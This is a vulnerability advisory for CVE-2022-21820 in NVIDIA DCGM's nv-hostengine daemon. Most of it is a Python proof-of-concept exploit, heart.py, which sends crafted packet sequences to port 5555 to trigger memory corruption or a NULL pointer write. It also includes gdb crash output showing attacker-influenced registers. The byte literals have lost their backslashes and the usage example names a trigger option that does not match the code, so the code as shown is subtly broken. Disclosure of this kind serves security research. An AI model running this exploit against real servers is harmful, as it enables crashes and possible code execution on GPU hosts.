NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health data. nv-hostengine is a daemon that by default listens on the loopback interface, but can also listen on the network for requests coming in on port 5555 (remote mgmt). A native client named DCGMI allows users to make requests to the daemon to support a variety of functions. Malformed packets can cause the daemon (running as root or user account) to crash or potentially result in code execution. Versions less than 2.3.5 are affected.
advisories | CVE-2022-21820
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
#
# heart.py
#
# NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability
#
# Jeremy Brown [jbrown3264/gmail]
#
# NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health
# data. nv-hostengine is a daemon that by default listens on the loopback interface,
# but can also listen on the network for requests coming in on port 5555 (remote mgmt).
# A native client named DCGMI allows users to make requests to the daemon to support
# a variety of functions. Malformed packets can cause the daemon (running as root
# or user account) to crash or potentially result in code execution.
#
# More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html
#
# Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected)
#
# $ ./heart.py 10.0.0.201 --trigger pkt3-mem
#
# $ gdb `which nv-hostengine`
# (gdb) r -b ALL -n
# nv-hostengine running as non-root. Some functionality will be limited.
# Started host engine version 2.3.1 using port number: 5555
# ...
# Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault.
#
# (gdb) i r
# rax 0x7ffbb3dbd010 140719031046160
# rbx 0x7ffff771ac70 140737344810096
# rcx 0x7ffbb3dbd010 140719031046160
# rdx 0x424242420 17786217504
# rsi 0x7ffff771aee4 140737344810724
# rdi 0x7ffbb3dbd010 140719031046160
# rbp 0x7ffff771ac40 0x7ffff771ac40
# rsp 0x7ffff771abe8 0x7ffff771abe8
# r8 0x424242420 17786217504
# r9 0x0 0
# r10 0x7ffbb3dbd010 140719031046160
#
# CVE‑2022‑21820
#
import os
import sys
import argparse
import time
import shutil
import signal
import socket
DEFAULT_PORT = 5555
PKT_START = b'xadxbcxbcxad'
#
# Trigger #1: Memory Corruption via malformed packet 3
#
TRIGGER_ONE_PKT_1 = PKT_START +
b'x01x00x00x00x11x00x00x00x00x01x00x00x00x00x00x00x0ax0fx08x03x10x03x18x00x28x00x42x05xc2x01x02x08x00'
TRIGGER_ONE_PKT_2 = PKT_START +
b'x01x00x00x00x1ax00x00x00x00x02x00x00x00x00x00x00x0ax18x08x03x10x03x18x00x28x00x42x05xc2x01x02x08x00x48xa4xecxc4x94x81x83xf5x02'
# 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420
TRIGGER_ONE_PKT_3 = PKT_START +
b'x03x00x00x00x3ax03x00x00x00x01x00x00x00x00x00x00x0axb7x06x08x38x10x03x18x00x28x00x42xacx06xaax01xa8x06x28x03x00x01x00' +
b'x84' * 51 +
b'x00' * 488 +
b'x19x00x00x00x9ex00x9fx00xa4x00xa0x00xa3x00xa2x00xa1x00x82x00x36x00x55x00x52x00x33x00x32x00x35x00x39x00x3ax00x3bx00x5ax00xfax00xfcx00xfbx00x01x00xf4x01x42x00x43' +
b'x00' * 207 +
b'x01x00x00x00'
#
# Trigger #2: NULL ptr write via malformed packet 4
#
TRIGGER_TWO_PKT_1 = TRIGGER_ONE_PKT_1
TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2
TRIGGER_TWO_PKT_3 = PKT_START +
b'x03x00x00x00x3ax03x00x00x00x01x00x00x00x00x00x00x0axb7x06x08x38x10x03x18x00x28x00x42xacx06xaax01xa8x06x28x03x00x01' +
b'x00' * 12 +
b'x01x00x00x00x01' +
b'x00' * 523 +
b'x19x00x00x00x9ex00x9fx00xa4x00xa0x00xa3x00xa2x00xa1x00x82x00x36x00x55x00x52x00x33x00x32x00x35x00x39x00x3ax00x3bx00x5ax00xfax00xfcx00xfbx00x01x00xf4x01x42x00x43' +
b'x00' * 207 +
b'x01x00x00x00'
# 0x79 triggers crash
TRIGGER_TWO_PKT_4 = PKT_START +
b'x04x00x00x00x1cx00x00x00x00x01x00x00x00x00x00x00x0ax1ax08x04x10x03x18' +
b'xff' * 9 +
b'x01' +
b'x79' +
b'x00x42x07xd2x01x04x08x03x10x00'
class Heart(object):
def __init__(self, args):
self.host = args.host
self.trigger = args.trigger
def run(self):
if(self.trigger == None):
print("error: choose which bug use via --trigger")
return -1
sock = self.getSock()
if(sock == None):
return -1
try:
sock.connect((self.host, DEFAULT_PORT))
except Exception as error:
print("connect() failed: %sn" % error)
return -1
if(self.trigger == 'pkt3_mem'):
if(self.sendPacket(sock, TRIGGER_ONE_PKT_1) < 0):
print("failed to send/recv packet 1n")
return -1
if(self.sendPacket(sock, TRIGGER_ONE_PKT_2) < 0):
print("failed to send/recv packet 2n")
return -1
if(self.sendPacket(sock, TRIGGER_ONE_PKT_3) < 0):
print("failed to send/recv packet 3n")
return -1
if(self.trigger == 'pkt4_null'):
if(self.sendPacket(sock, TRIGGER_TWO_PKT_1) < 0):
print("failed to send/recv packet 1n")
return -1
if(self.sendPacket(sock, TRIGGER_TWO_PKT_2) < 0):
print("failed to send/recv packet 2n")
return -1
if(self.sendPacket(sock, TRIGGER_TWO_PKT_3) < 0):
print("failed to send/recv packet 3n")
return -1
if(self.sendPacket(sock, TRIGGER_TWO_PKT_4) < 0):
print("failed to send/recv packet 4n")
return -1
print("donen")
return 0
def getSock(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
except Exception as error:
print("socket() failed: %sn" % error)
return None
return sock
def sendPacket(self, sock, pkt):
try:
sock.send(pkt)
except Exception as error:
print("socket send error: %sn" % error)
return -1
try:
sock.recv(256)
except Exception as error:
# print("socket recv error: %sn" % error)
return 0 # expected for pkt3_mem
return 0
def signalExit(signum, frame):
sys.exit(-1)
def arg_parse():
parser = argparse.ArgumentParser()
parser.add_argument("host",
type=str,
help="target host")
parser.add_argument("--trigger",
"--trigger",
type=str,
choices=['pkt3_mem', 'pkt4_null'],
help="which bug to trigger")
args = parser.parse_args()
return args
def main():
signal.signal(signal.SIGINT, signalExit)
args = arg_parse()
rh = Heart(args)
result = rh.run()
if(result > 0):
sys.exit(-1)
if(__name__ == '__main__'):
main()